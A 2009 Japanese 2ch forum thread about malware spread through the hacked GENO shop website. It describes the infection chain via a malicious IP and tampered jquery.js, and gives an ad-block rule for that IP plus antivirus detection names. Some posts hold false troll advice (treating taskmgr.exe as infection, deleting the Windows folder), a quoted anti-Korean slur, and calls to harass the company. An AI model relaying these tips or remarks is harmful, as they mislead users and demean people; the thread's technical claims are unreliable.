1 :
サクラソウ(dion軍) :
2009/04/06(月) 23:05:29.24 ID:4tJoYW5y BE:2122092678-PLT(12000) ポイント特典 中古PCとPCパーツの通販ショップGENO URL略
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326- 326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
前スレ
GENOなどのサイトでウイルス感染★5
http://tsushima.2ch.net/test/read.cgi/news/1239009596/ 4/4 AM10時ごろ〜?からサイトにアクセスするだけで感染。
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。
今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
クリーンインストール推奨
・最新版のWindowsUpdateとadobeAcrobatとAdobe Flashであれば感染しない?
・ファイル作成を検出できたアンチウイルスソフトは40のうち10だけ。
・結論、管理もしてないようなPCでアクセスすれば余裕で感染する。
あちこちに短縮URLが貼られているようなので注意
発覚してないだけで他にも感染しているサイトがあるかも
2 :
アグロステンマ(関西地方) :2009/04/06(月) 23:05:52.20 ID:hSh05tv7
ま
速い
4 :
サクラソウ(dion軍) :2009/04/06(月) 23:06:52.87 ID:4tJoYW5y
(1)感染したWebページをひらく ↓ (2)感染したjsが、94.247.2.195の改変jquery.jsを実行 ↓ (3)IP/UAで振り分け処理(Vistaは大丈夫そう?) ↓ (4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開 ↓ (5)bufferOverrunでウィルス本体の起動を試行 感染した場合 パスワードなどの個人情報が抜かれている可能性あり いつものバックドア系ウイルスなんだけど、今回なんか変だな ・PDFファイルとかシステムファイルがなぜか増殖する ・メモリを馬鹿食いする ・再起動時にブルースクリーン とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな 対策 WindowsUpdate PDFリーダーを最新にする (AdobeReader や Foxit Reader) AdobeFlashを最新にする 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 Javascriptを切る スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)
5 :
ケマンソウ(福島県) :2009/04/06(月) 23:07:11.11 ID:HjviSCsZ
まだやってんの?
6 :
水芭蕉(関西地方) :2009/04/06(月) 23:07:36.45 ID:HeyTsuvq
まだ続けるのかよw
1000 名前: カロライナジャスミン(山陰地方)[sage] 投稿日:2009/04/06(月) 23:06:05.16 ID:fWImSR6Y 1000ならゲノ死亡 よくやった
実は俺の初1000ゲトだったりするわけで……これまで取れなかったのに何でこんなとこで
9 :
キブシ(静岡県) :2009/04/06(月) 23:09:11.34 ID:WLvvfchb
ニュー速から戦死者が出たことは忘れない
10 :
イワカガミダマシ(西日本) :2009/04/06(月) 23:09:20.72 ID:C0QgVMw5
やめません 直るまで
11 :
タツナミソウ(神奈川県) :2009/04/06(月) 23:09:27.28 ID:kYpBlSOw
まだやってるのか VISTAで踏みまくったが問題なかったからいいや イメージもバックアップもとってあるから
これfoxitでもまずいの?
スレ3のアドレスください
おい、おまいらのせいでwindos update重いんだけど。
15 :
サクラソウ(dion軍) :2009/04/06(月) 23:11:02.02 ID:4tJoYW5y
16 :
タツナミソウ(神奈川県) :2009/04/06(月) 23:11:05.14 ID:kYpBlSOw
前スレ
>>987 コマンドプロンプト起動した覚えは?
conime.exeはコマンドプロンプトで日本語を表示する為の物なんだけど
18 :
カタクリ(長崎県) :2009/04/06(月) 23:12:33.66 ID:2J+HSe42
今こそ国際電話(Q2)を復活させようぜ!
AVAST! 090406-0 antivir 7.01.03.19 これ対応してないよね? なんかPC遅いんだよな、払いきれてない感じがする
トロイに壁紙をエロ画像に変えられたのはいい思い出
21 :
ベニバナヤマボウシ(静岡県) :2009/04/06(月) 23:14:13.87 ID:uSJH9xGQ
NoScript重いからYesScriptで代用してたのに さすがに今回はNoを入れて凌ぐわ NoScriptみたいに高機能じゃなくていいから 単純にホワイトリスト形式でスクリプト制限してくれるアドオン無いかな?
今家電で売ってるパソって全部vistaじゃんか 知識無いからメーカー品買うのに肝心のネット初心者が vista使ってるんじゃ感染しないんジャマイカよ
こういう鯖管の行動 coderedやnimdaの時に沢山見たな 馬鹿すぎて最後は誰かのせいにして思考停止
PC初心者でもわかるように説明してほしい どんなウイルス?
26 :
コスミレ(愛知県) :2009/04/06(月) 23:16:19.93 ID:uy8mRWXW
いちもつ
何でGENO【などの】なの?
各アンチウィルスの対応状況とか纏めてくれよ
29 :
ツゲ(東京都) :2009/04/06(月) 23:18:26.22 ID:qIJKmnXw
踏んだからスキャンしたらノートン何も検知しなかったんだけど大丈夫かな
30 :
ビオラ(長野県) :2009/04/06(月) 23:18:27.47 ID:fBMVjkoS
再起動しても大丈夫だったけどスタートアップのアプリが起動しなくなった
OSの再インストールおっ始めたがアプリのインストール考えると鬱になる 恨むぞGENO
33 :
サクラソウ(dion軍) :2009/04/06(月) 23:19:54.71 ID:4tJoYW5y
検出できるソフト一覧 ●a-squared 4.0.0.101 2009.04.03 Trojan-Spy.Agent!IK ●Avast 4.8.1335.0 2009.04.03 Win32:Daonol-L ●eSafe 7.0.17.0 2009.04.02 Suspicious File ●GData 19 2009.04.03 Win32:KillAV-KS ●Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent ●Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg ●McAfee+Artemis 5573 2009.04.03 Generic!Artemis ●Prevx1 V2 2009.04.03 High Risk Cloaked Malware ●Sophos 4.40.0 2009.04.03 Mal/Generic-A ●TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
てかGENO側は何も対応してないの? 酷すぎだろ
36 :
プリムラ・フロンドーサ(埼玉県) :2009/04/06(月) 23:21:27.76 ID:+fA3NqCc
>>23 自称・情報強者が引っかかるので問題ありません
>>33 Update AVG - AVI 270.11.43/ 2043
Added detection of new variant of Worm/Generic.XYQ, Worm/Generic.XYY, new variants of trojans Agent2.CWY, Downloader.Generic8.AFHP, Generic13.ULR, BackDoor.Generic11.GUZ.
April 6, 2009
規制依頼にリンクまとめ貼ってあったがあれ結構やばいだろ
会社のPCでアクセスしちまったよ・・・ 明日には管理者にバレルんだろうなあ
>>33 のはもう古いかも
誰かがvirustotalだかにもう一度うpすれば検出できるソフト更新されてるかも
41 :
コブシ(大分県) :2009/04/06(月) 23:23:25.62 ID:sLPMAwDQ
>>17 当人ではないがコマンドプロントを起動してないが
conime.exeが動いてる
urlはおそらく踏んでないが、自信ない 当方vista
43 :
シラー・カンパヌラータ(アラバマ州) :2009/04/06(月) 23:23:40.87 ID:b2z/hc44
トロジャン(笑)
aviraも今は検出できるはずだな
会社のPCでアクセスとか救いようのねぇ馬鹿だな
49 :
オオタチツボスミレ(東京都) :2009/04/06(月) 23:27:05.64 ID:rrMoZaqr
>>45 ,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいおまち!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__ ∬∫
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_ | ̄ ̄ ̄|
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i ` |二茶二|
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i ヾニニニ.ノ
51 :
ナニワズ(神奈川県) :2009/04/06(月) 23:27:40.04 ID:CXFwf+Kp
再インスコめんどくせぇぇぇ
52 :
クモマグサ(アラバマ州) :2009/04/06(月) 23:27:47.70 ID:NZfxPrL5
つうか情弱じゃなければ通常、HijackThisあたりで確認すんだろ processesや、 Protocol、stylesheet、Serviceなんて見たことねえのか
>94.247.2.195(94.247.[2-3].[0-255])への接続を遮断 これやりかたキボンヌ
54 :
コハコベ(千葉県) :2009/04/06(月) 23:30:09.99 ID:RAsn9HbR
>>50 あ、そっちのスレでいろいろと他のサイトでの同種ウィルス被害が寄せられてたのか。
ここのスレしかチェックしてなかったから全然知らなかったわ。
今日の疑心暗鬼スレ めしうまwwww まあ俺も踏んでるわけだが。
56 :
雪割草(福岡県) :2009/04/06(月) 23:31:27.29 ID:5pPjoQqo
>>53 Adblock Plusで遮断するのなら
*/94.247.[2-3].[0-255]/*
を要素に追加。
57 :
アルメリア(東日本) :2009/04/06(月) 23:31:31.51 ID:+vRljxxx
GENOから商品発送のお手紙が届いてた ちゃんと機能してて安心した
GENOの事は知ってたのに 検索して一番上にあったのを何も考えずに踏んでしまった conime.exeが動いてたらアウトなの?
59 :
クレマチス・モンタナ(九州) :2009/04/06(月) 23:31:53.05 ID:Ugt3gVVi
ウイルスキラーはよせいやああああああああああああああああ
60 :
セイヨウタンポポ(アラバマ州) :2009/04/06(月) 23:32:54.87 ID:h7WaMfhP
普通にページ復活してて謝罪が一切見あたらないんだけどどういうこと?
>>40 aviraに送ったpdfファイルの検体上げてみたら2個しか対応してないみたいだぜ。
F-Secure: Exploit.Win32.Pidief.aog
Kaspersky: Exploit.Win32.Pidief.aog
62 :
ミツマタ(dion軍) :2009/04/06(月) 23:33:32.31 ID:w8+NbaTJ
>>33 NOD32はダメか・・・
NODの時代も終わりかな
63 :
桜(中部地方) :2009/04/06(月) 23:33:46.03 ID:r/fRH6Tn
あれれ?またメンテナンス中になっちゃってるw
>>60 50文字ぐらいでなんか右あたりに小さく書いてあったよ
よく分からないんだがgenoのサイトにさえ行かなきゃ良いんのかな?
67 :
レンギョウ(福島県) :2009/04/06(月) 23:36:51.40 ID:DMn3i2ip
現在の更新の情報 合計時間: 1:06 - Vps: 更新されました (前のバージョン: 090405-1, 更新後のバージョン: 090406-0) サーバー: download975.avast.com (74.54.138.226) ダウンロード ファイル: 5 (27.92 KB) ダウンロード時間: 3 s
68 :
コハコベ(千葉県) :2009/04/06(月) 23:38:04.02 ID:RAsn9HbR
>>65 芸能事務所の研音がやってるネット通販サイトや
楽天の特定のショップなんかでも
同じウィルスに反応したって書き込みがセキュリティ板のスレにあった位なんで、
geno以外のサイトでも危ない可能性も十分にある。
>>42 >>48 名前はいくらでも偽装出来るからなぁ
プログラムの置いてある場所を確認すればいいかも
70 :
キバナスミレ(関東・甲信越) :2009/04/06(月) 23:41:54.20 ID:jah6RO8L
よく考えたらエロ動画とアニラジしか持ってないから、どうでもいいや
71 :
ミツマタ(dion軍) :2009/04/06(月) 23:42:11.98 ID:w8+NbaTJ
Antivirus Software NOD32 Update info Update 3989 (20090406) 2009-04-06 12:03 INF/Autorun, Win32/Adware.InternetAntivirus (5), Win32/Adware.MSAntispyware2009 (2), Win32/Adware.SystemSecurity, Win32/Adware.Virtumonde (2), Win32/Agent.PEH (3), Win32/Agent.PEI, Win32/Agent.PEJ, Win32/Agent.PEK (2), Win32/AutoRun.FlyStudio.FO (2), Win32/BHO.NNU (2), Win32/Cimag.AA, Win32/Delf.OEY (3), Win32/DNSChanger, Win32/FlyStudio.NIX, Win32/FlyStudio.NIY (2), Win32/Hupigon.NNE, Win32/Olmarik.FT (6), Win32/Prosti.NBZ (2), Win32/PSW.LdPinch.NKR, Win32/PSW.Lineage.NHH, Win32/PSW.OnLineGames.NMP (3), Win32/PSW.OnLineGames.NMY (3), Win32/PSW.OnLineGames.NNU (4), Win32/PSW.OnLineGames.ODJ, Win32/PSW.OnLineGames.XTT (2), Win32/Rootkit.Agent.NKR (5), Win32/Spy.Zbot.NW, Win32/TrojanClicker.Delf.NDJ, Win32/TrojanClicker.Delf.NDK, Win32/TrojanClicker.Delf.NDR (3), Win32/TrojanClicker.Delf.NGQ (2), Win32/TrojanClicker.Delf.NGR (6), Win32/TrojanDownloader.Agent.OXU (2), Win32/TrojanDownloader.Agent.OYF (3), Win32/TrojanDownloader.Agent.OYW, Win32/TrojanDownloader.Delf.OSA (2), Win32/TrojanDownloader.Delf.OSB, Win32/TrojanDownloader.FakeAlert.ABE, Win32/TrojanDownloader.FakeAlert.ABF (3), Win32/TrojanDownloader.Small.ONY (2), Win32/TrojanDownloader.Zlob.CZG, Win32/TrojanDownloader.Zlob.CZK, Win32/TrojanDropper.Agent.NXQ, Win32/TrojanProxy.Small.NDR (2), Win32/VB.ND, Win32/Wigon.KA 対応してるのか対応してないのか多すぎてよく分かんないや
conime.exeはデフォルトで起動してるから大丈夫だよ たぶん
73 :
アヤメ(愛知県) :2009/04/06(月) 23:42:53.76 ID:vtQoWNO2
ふひー この頃中古パソコン通販サイトを巡回してたから心配だったけど感染してなかったぜ 感染したらでる症状は無いし 糞マカフィーでウイルススキャンもした
76 :
アヤメ(愛知県) :2009/04/06(月) 23:44:20.88 ID:vtQoWNO2
もし感染してHDDが壊れたりしたらたまらん HDDにリカバリ機能が埋め込まれているタイプだ どのURLもふめん
Adobeのメーラーみたいのが立ち上がってたんだが もう手遅れ?
78 :
カントウタンポポ(大阪府) :2009/04/06(月) 23:44:37.26 ID:y9Oam7Un
NoScript最強伝説
79 :
サクラソウ(catv?) :2009/04/06(月) 23:45:18.43 ID:q3CTINSl
うんこ
81 :
ビオラ(神奈川県) :2009/04/06(月) 23:45:59.91 ID:X4gFusG9
踏むと具体的にどんな被害が出るの?
当方vista、該当URL未踏、conime.exe動いてるけど問題無し たぶん
83 :
ケンタウレア・モンタナ(東海) :2009/04/06(月) 23:47:27.96 ID:yclA/QEE
ウイルスとか感染経験ないからよくわかんないんだけど HDDってウイルスで物理的に壊されるってあるの?
>>69 system32にあるみたい
問題なさそうですね
85 :
雪割草(福岡県) :2009/04/06(月) 23:48:06.26 ID:5pPjoQqo
そうか、Vistaでconime.exeは平気なのか 元々未踏だけど良かった良かった たぶん
87 :
ヘラオオバコ(長崎県) :2009/04/06(月) 23:50:18.46 ID:+TSOM/Ou
88 :
コハコベ(千葉県) :2009/04/06(月) 23:50:29.06 ID:RAsn9HbR
>>83 もともと壊れかけてたHDDに
ウィルスによってガリガリ書き込まれて壊れるなんていう可能性もゼロではない。
89 :
ヘラオオバコ(長崎県) :2009/04/06(月) 23:51:01.06 ID:+TSOM/Ou
91 :
キランソウ(神奈川県) :2009/04/06(月) 23:52:23.18 ID:BgCbEVwt
>株式会社GENO(ジェノ)は常にお客様の立場で考え
ここでジェネオンがウイルス感染すればいいのに
93 :
アヤメ(愛知県) :2009/04/06(月) 23:53:47.64 ID:vtQoWNO2
他のパーツ&ジャンクショップは genoの人気に嫉妬してるなw
95 :
アメリカヤマボウシ(アラバマ州) :2009/04/06(月) 23:54:22.53 ID:5hUOEPvM
antivir 7.01.03.20 これか、またスキャンしてくるか
南朝鮮人の犯行なのか
97 :
マツバウンラン(青森県) :2009/04/06(月) 23:55:00.41 ID:orAYOQpL
お詫びはあったの?
よく考えてみたらスレ内でも末尾にjpgが付いてないURLなんか 踏まないようにしてるから現時点では感染はしてないだろうな・・
99 :
アヤメ(西日本) :2009/04/06(月) 23:55:48.65 ID:0hc/751Y
サーバーメンテ中に踏んで、1回電源も落としたけど 特にそれっぽい症状今のところないな。 試しにIEも使ってみたけど、エラーふいたりしないし。
再起動して帰ってこれたって事は感染してないって事だな
103 :
アヤメ(西日本) :2009/04/06(月) 23:56:57.88 ID:0hc/751Y
>>98 末尾は全く関係ない
jpgだろうがzipだろうが偽装し放題だ
104 :
サクラソウ(東京都) :2009/04/06(月) 23:57:00.23 ID:pS5BjbUv
イヤガラセと仕返しのために、 genoウイルス で、いろんなサイトで 検索しまくろう。 グーグルの、 「急上昇キーワード」 にのせてしまおう
>>17 XPなんだがコマンドプロンプト開いた覚えはないなあ
PC起動するのが怖くなってきた。
CPUは何もしていない状態で5%ちょっと。
>>93 普通の動画ページだった。関係ないっぽいけどね
【維新政党・新風】弁士、韓国人に襲われる
カテゴリ 政治 での前日マイリスト順位:圏外 ( 過去最高:圏外 ) 【ランキング推移を確認】
youtubeから。この朝鮮人は「韓国人はゴミ」という発言にファビョったみたいです。本当にゴミと言ったのか火病の妄想なのかはさだかではありませんが、
2:12に「おどんりゃ韓国人なめとったら殺すぞ」と発言しています。
さて、日本の法律で罰せられるのはどちらなのでしょうか?追記:マイリス支援ありがとうございます。皆さんに大変感謝しております。
他の方の動画はどうやら消されてしまったみたいです…。
※そういえば、ブラック軽部さんがよく「ゴミはゴミ箱に!朝鮮人は朝鮮半島に!」と言ってますね^^似たような物です
って内容
>>93 維新政党・新風、弁士の「韓国人はゴミ発言」に
在日韓国人がキレて「暴行」するニコニコ動画
109 :
アヤメ(愛知県) :2009/04/06(月) 23:59:38.09 ID:vtQoWNO2
>>99 一度も踏んでないけど でもやっぱり怖い 一度も踏んでないから怖い
>>105 自分もプロセス数がいつもより多いと怖くなる事があるよ
system32にあるようなら心配いらないと思う。
>>102 今回のやつも再起動したら帰ってこれないタイプ?
そうとは知らず、寝て起きてから対応すっか。って電源切ったわあぶねえw
112 :
藤(静岡県) :2009/04/07(火) 00:00:28.96 ID:uNvGQdp3
挿入っちゃった?
Acrobat入れてなかった・・・ スキャンした時間無駄だった
114 :
アルストロメリア(愛知県) :2009/04/07(火) 00:02:11.03 ID:vtQoWNO2
今の所なんの症状もでててててないし 感染したらの条件にもおあてはまらなないけでお 再起動するのが怖い
115 :
ストック(愛知県) :2009/04/07(火) 00:02:22.84 ID:eA42zTp3
またもやavast先生大勝利!
>感染した場合 >・再起動時にブルースクリーン >とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな
げのは何か対策したの?
118 :
サンシュ(神奈川県) :2009/04/07(火) 00:03:19.29 ID:xYAGql03
KingSoftまだなんですか
119 :
プリムラ・マラコイデス(長屋) :2009/04/07(火) 00:03:36.34 ID:siulDVY1
/__.))ノヽ .|ミ.l GENO._i.) (^'ミ/.´・ .〈・ リ .しi r、_) | ウィルスはわしが育てた | `ニニ' / ノ `ー―i´
してない
ジェノサイトウィルス感染病はもう治ったんかいな
122 :
サトザクラ(dion軍) :2009/04/07(火) 00:04:15.95 ID:9PtYcuVS
ノートンで検出できる?
123 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:05:14.29 ID:pgsxCmAv BE:493376494-2BP(8000)
最近、何にも使ってないのにスタートメニューにメモ帳とペイントがあるんだけど何だろか?
>>110 取り敢えずどのサイトも信用できないからこの騒動おさまるまでPCはiPod充電だけに使うことにするよ。
まぁ、何回も再起動しても普通に起動するから大丈夫だよな。IE落ちたりもしないし。
安心して寝れるわ。ありがとう
ああ・・ Javascript切ってれば大丈夫なのか 火狐で良かったわ zipと思って踏んだら罠だったってのが我ながら情けない限りだが
セキュリティソフトはこういうときにサクっと対応するほうが TVでCMするより宣伝効果ありそうなもんだが いや、ないな、ないわ
127 :
アルストロメリア(愛知県) :2009/04/07(火) 00:06:31.47 ID:vtQoWNO2
128 :
ニリンソウ(京都府) :2009/04/07(火) 00:06:33.12 ID:WOlV9TlO
AVG今回の対応遅かったな P2Pに出回るウィルスには強いから今後も使い続けるけど
AVGはまだダメって本スレにかいてある・・・ 怖いよ
よくわからんけどこえー しばらく画像スレにはいけないな
131 :
ハナモモ(宮崎県) :2009/04/07(火) 00:08:54.70 ID:07SNJE2W BE:9966672-2BP(7)
AntiVir対応きた?
またスキャンするか
132 :
マムシグサ(神奈川県) :2009/04/07(火) 00:09:52.80 ID:MtO90/es
毎日GENOと電脳バイオーを見るのが日課だけどウイルスになんて感染しなかったぞ?? Sleipnir2.xでIE8コンポ使用、avast!とPCtoolsを使ってる
あれだけニュー速騒いだくせにTOPの隅っこで謝罪とか笑える
GENOのサイトが鯖メンテ中になってるな 昨日は実験用の仮想マシンで踏んだらAvastが反応したけど
136 :
アルストロメリア(愛知県) :2009/04/07(火) 00:11:59.82 ID:PpAfGl6U
感染しないよにする対策とかってないの?
137 :
ボケ(愛知県) :2009/04/07(火) 00:12:21.64 ID:3Qk1h4XE
>>127 Javascript切ってれば良い
だからスレイプニルでも対策できる
avastの検査 トレンドマイクロのオンラインスキャン完了 なんもでねぇな つまんね
毎日GENO見てる俺涙目 昨日再起動した時開いても無いのに、 "表示中のpdfが閉じられようとしていますと" とかでて?だったんだけど感染したか・・・
140 :
ヒュウガミズキ(catv?) :2009/04/07(火) 00:13:43.55 ID:pJv5Llq+
なんで情報強者のニュー速民がひっかかってるのかと思ったら、 zipスレで性欲に負けて何の疑いもなしにURLクリックしたZIP猿共なのか
141 :
ニオイタチツボスミレ(兵庫県) :2009/04/07(火) 00:14:03.96 ID:2Etgg6kd
2ch内では結構大きな騒ぎなのに ニュースサイトが軒並み報じないのはなんでどうして?
メモリ使用量600MBって・・・
143 :
藤(静岡県) :2009/04/07(火) 00:14:47.92 ID:7FEIlg8h
知名度が無いのが致命的
144 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:15:01.08 ID:a3TeJlzo
147 :
アルストロメリア(愛知県) :2009/04/07(火) 00:16:26.29 ID:PpAfGl6U
>>137 Javascriptって切ってて困ることってないか?
誤爆した。
誤爆ついでに
>>146 のリンク先のzip,Vb2009でウイルス反応でるんだけど誤検知?
>>141 邪推でもなんでもないが騒げるだけのネタに育ったら
報道しだすだろうよ
lightboxが動かない
151 :
ボケ(愛知県) :2009/04/07(火) 00:17:33.72 ID:3Qk1h4XE
152 :
ヘビイチゴ(アラバマ州) :2009/04/07(火) 00:18:33.92 ID:lhyoCUbm
HIPS導入してる奴でトロイ送られたのは誰かいないのか? AVで検知できなくても実行は阻止できただろ つーかそんなあからさまなウイルスならヒューリスティックで検知できそうなもんだけど
NOD32を仮想のXPに入れ替えて本PCにカスペルスキー 買って入れようと思うのだがいくらぐらいするの? あとネットから手軽にインスコできる?
154 :
アルストロメリア(愛知県) :2009/04/07(火) 00:19:18.05 ID:PpAfGl6U
Javascript多用のサイトが多いのが困る
C:\Documents and Settings\村岡隆\My Documents\My Pictures\SEXY.JPG ↑ この画像開いてからちょっとPCが重くなったんだが・・・ JPGは大丈夫だよね?
157 :
アルストロメリア(西日本) :2009/04/07(火) 00:20:18.79 ID:bIJ3TbD3
>>149 対処方法が明らかでないから二次被害を避けて自重している……なんてわけないか
159 :
アルストロメリア(西日本) :2009/04/07(火) 00:21:00.31 ID:bIJ3TbD3
JPG仕込みって最近有名だよね
161 :
アルストロメリア(愛知県) :2009/04/07(火) 00:21:33.22 ID:PpAfGl6U
今回のウイルスの名前は村岡sexyウイルスで決定か
村岡隆登場
163 :
ストック(愛知県) :2009/04/07(火) 00:22:04.10 ID:vwosJmBt
164 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:22:06.11 ID:a3TeJlzo
そんな名前のウィルスにパソコンつぶされるとかたまんねえよ!!!!!!!!
165 :
ヘビイチゴ(アラバマ州) :2009/04/07(火) 00:22:07.18 ID:lhyoCUbm
>>153 どうせなら最近下がり目のカスペより高検出で且つ安いGDATAにすればいいのに
NOD使ってるくらいだからあまり良いスペックじゃないのかもしれんけど
166 :
オウレン(神奈川県) :2009/04/07(火) 00:22:23.20 ID:R85rkQ1u
なかなかイイ名前だね
167 :
ハルジオン(コネチカット州) :2009/04/07(火) 00:22:46.73 ID:UhREyoqJ
ここから村岡スレ
168 :
ヒヤシンス(福岡県) :2009/04/07(火) 00:22:53.09 ID:pnDf58uK
村岡sexyウィルスか 語呂もいいしこれでいいな
169 :
サトザクラ(東京都) :2009/04/07(火) 00:22:57.71 ID:9VC7AOSz
普通の人なら 交通事故起こしたら、 通報してけが人の搬送に協力したり、 発煙筒焚いたり、三角のやつ立てたりして、 他の車や人に危害を与えないような措置をとりますよね。 家から火が出たら通報しますね。 まー第一は自分のためだけど、 よそに飛び火させない配慮として、 すぐ119番しますよねー そういうことしてないんだから、 類推判断でいえば、 「未必の故意」 だからGeno死ね で、殺し方w genoウイルス で、いろんなサイトで 検索しまくろう。 グーグルの、 「急上昇キーワード」 にのせてしまおう
170 :
イワザクラ(東京都) :2009/04/07(火) 00:23:09.16 ID:3rFtlOL+
村岡と言えば
こういうのってブラウザ側が対処するもんだろ
172 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:23:29.59 ID:pgsxCmAv BE:82229832-2BP(8000)
173 :
ツルハナシノブ(千葉県) :2009/04/07(火) 00:23:44.78 ID:+EO0IjVV
175 :
クレマチス・モンタナ(コネチカット州) :2009/04/07(火) 00:24:04.13 ID:UhREyoqJ
いいから早くセクムラウイルスの詳細よこせよ
白鯛は許さない
177 :
ビオラ(コネチカット州) :2009/04/07(火) 00:24:20.73 ID:EFJaFBRI
セロリンたんじゃアバスト重いお・・・
178 :
サトザクラ(dion軍) :2009/04/07(火) 00:24:24.95 ID:ly823CjS
179 :
アルストロメリア(愛知県) :2009/04/07(火) 00:24:53.33 ID:PpAfGl6U
180 :
ストック(愛知県) :2009/04/07(火) 00:25:02.12 ID:vwosJmBt
もう村岡隆Sexyウィルスでいいよ
村岡隆ってmu-サソ?
183 :
オランダミミナグサ(コネチカット州) :2009/04/07(火) 00:25:35.38 ID:uMimjOnU
185 :
サトザクラ(千葉県) :2009/04/07(火) 00:25:41.55 ID:5NnR5PGs
また岡ちゃんがウイルスに掛かったのか
186 :
サトザクラ(東京都) :2009/04/07(火) 00:25:41.95 ID:CTlb1CUm
ええええええ踏んでないのにすでにリンクの色かわっとル
188 :
ハナモモ(宮崎県) :2009/04/07(火) 00:25:53.06 ID:07SNJE2W
189 :
コバノランタナ(千葉県) :2009/04/07(火) 00:26:01.16 ID:hD4R3NI8
村岡隆セクシー(笑)
191 :
ユリオプスデージー(埼玉県) :2009/04/07(火) 00:26:18.04 ID:9ywWHThL BE:1506985867-PLT(12222)
メモリが激しく動いてなければおk?
192 :
アルストロメリア(愛知県) :2009/04/07(火) 00:26:21.66 ID:PpAfGl6U
193 :
ニオイタチツボスミレ(兵庫県) :2009/04/07(火) 00:26:25.95 ID:2Etgg6kd
>>170 ケツ毛バーガーこと村岡万由子さんのことはもう許してやれよ
完全に村岡隆に乗っ取られた
195 :
サトザクラ(dion軍) :2009/04/07(火) 00:27:48.33 ID:uS2Hnc6/
タカ坊ときいて
とりあえずAVGでウイルススキャンしとこ^^
197 :
ストック(愛知県) :2009/04/07(火) 00:28:01.65 ID:vwosJmBt
セクシー村岡
Geno ウイルス、 PDF と exe には対応したようだ。 \dropper.pdf [0] Archive type: PDF Stream --> Object [DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit [WARNING] The file was ignored! \dropper.swf' \malformed.jquery.js' \monitor.bin' \dropper.bin' [DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program [WARNING] The file was ignored! \dropper.html'
村岡隆ってカイジかw
200 :
ビオラ(山梨県) :2009/04/07(火) 00:29:10.85 ID:dRIZS+Cl
201 :
イワザクラ(東京都) :2009/04/07(火) 00:29:16.33 ID:3rFtlOL+
もうケツ毛タカシでいいよ
村岡隆って誰だよwwwwww俺しらねーしwwwwwwww
リカバリマンドイ
204 :
ツボスミレ(関西地方) :2009/04/07(火) 00:30:16.46 ID:QovEsDQc
SEXY隆
プニルのnoscriptもどきのおかげで助かったw
206 :
ストック(愛知県) :2009/04/07(火) 00:30:33.15 ID:vwosJmBt
208 :
アルストロメリア(愛知県) :2009/04/07(火) 00:30:51.45 ID:PpAfGl6U
ウイルスSEXY-TAKASI-
209 :
センダイハギ(千葉県) :2009/04/07(火) 00:30:53.99 ID:wchpM5xR
>>173 ソースチェッカーで開こうとしたらなぜか対象をブラウザで開くをクリックしてた
もう寝るか
210 :
イワザクラ(東京都) :2009/04/07(火) 00:31:06.04 ID:3rFtlOL+
サイト復活してたのね これ、もう大丈夫なの? しかし、謝罪一切なしかw
最後がjpgで専ブラでカーソル合わせただけでも感染?
ここの連中も釣られてやんのww
「サーバーに一部不具合がございました。」 この程度かw
218 :
アルストロメリア(愛知県) :2009/04/07(火) 00:34:10.65 ID:PpAfGl6U
GENOはもう行っても大丈夫なのか?
219 :
フデリンドウ(東京都) :2009/04/07(火) 00:34:51.08 ID:UPpZUNuf
>>213 なんとも無いみたい、が
安価にカーソル合わせたらAVGが反応した
駄目
ウィルス撒き散らしながら商売致しますってか なんかもうヤケクソだな
222 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:36:21.83 ID:a3TeJlzo
確かカーソル合わせただけでも駄目なんじゃなかったっけ?
223 :
クンシラン(和歌山県) :2009/04/07(火) 00:36:48.64 ID:oMzDAMFd
タスクマネージャー開いてtaskmgr.exeがあったらアウト
224 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:37:02.87 ID:pgsxCmAv BE:986753489-2BP(8000)
>>219 怖いからlive2chのポップアップ機能変更しとこ
225 :
アルストロメリア(愛知県) :2009/04/07(火) 00:37:05.76 ID:PpAfGl6U
>>222 専ブラ使いこなせなくてつい最近アンインストールしててよかった
226 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:37:11.88 ID:a3TeJlzo
な、なんだってー
227 :
ストック(愛知県) :2009/04/07(火) 00:37:17.61 ID:vwosJmBt
228 :
ラフレシア(東京都) :2009/04/07(火) 00:37:19.74 ID:Yn6ot/oR
社員共スレ潰し作業乙w
229 :
ウグイスカグラ(広島県) :2009/04/07(火) 00:37:49.27 ID:A7qij7bZ
JavaScriptを無効にしていれば大丈夫だろうし、Adobe ReaderやFlash Playerを最新版にしてあれば問題なさそうだけどな。 でもJavaScriptなしのウェブってもう考えられない感じだし、面倒だけどこれからもマメにソフトをアップデートするしかないな。
231 :
アルストロメリア(愛知県) :2009/04/07(火) 00:38:08.84 ID:PpAfGl6U
>>223 Windowsフォルダ削除してくる\(^o^)/
232 :
